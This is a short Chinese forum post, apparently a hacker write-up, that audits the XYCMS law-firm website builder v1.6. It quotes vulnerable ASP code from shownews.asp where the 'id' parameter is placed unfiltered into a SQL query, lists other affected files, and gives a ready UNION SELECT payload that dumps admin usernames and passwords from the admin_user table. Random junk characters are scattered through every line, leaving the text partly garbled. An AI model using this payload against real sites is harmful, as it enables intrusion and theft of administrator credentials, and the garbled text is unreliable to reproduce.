前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似' F% h5 g) V; }+ D
" S: z1 M3 ~- W! _
淫荡分割线
7 o/ f) r5 o2 G9 g/ P9 E--------------------------------------------------------. j0 z3 @; Y$ B1 F7 \, Z
9 _" ?( n) D: x$ W. a) ?8 i审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)- h- P( v# c) S+ |/ q
源码地址:http://down.chinaz.com/soft/29233.htm
- H# b! W( R+ f8 y* b' u / G9 X+ V0 y- `* V" e2 `! F5 y8 F
漏洞文件:shownews.asp* N9 F9 O) i& q5 `/ X+ n
漏洞代码:7-13行
$ Z6 }: ]( x$ x) {- I0 d# O & z' E& S4 E7 r$ D Z( `
7 ?- L1 e9 x" t! A<%
9 c8 p& f! t7 g. ?& Q- Z, }id=request.QueryString("id")5 q+ f; E% X2 }3 T3 r: t
7 {0 g1 y: b) c- l9 D4 R1 B z* h
set snews=server.createobject("adodb.recordset")
+ O$ D% {. G- }4 P+ s' u* }exec="select * from [news] where id="&id; X5 n. }+ }4 H0 q+ x
snews.open exec,conn,1,1- h+ ]# S+ A) V& h, C% B# v, X
%>
% d1 C8 m1 T( b1 j; `5 K
k* E9 V: K. l W, Y" T H. b8 a/ T, H( G5 p3 h& h
什么过滤都没有 直造成注入' V0 S& C. u& Z Z) l5 r6 v9 s
" [1 \% Q( Q$ f( q
注入点:http://127.0.0.1:99/shownews.asp?id=xx
! }1 H4 {1 m5 c# k) ^4 | K) a6 O3 a$ i* W" r
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找9 z" i4 t- M' n7 Y. e/ p- a) ^( h
: J$ Q' Q7 f! w! t5 p % u5 ?0 n- T- ~- W+ S" C
exp: union select 1,admin,password,4,5,7 from admin_user
7 x8 F( `7 A5 q \( d
- k5 e- h, \8 G4 |- R |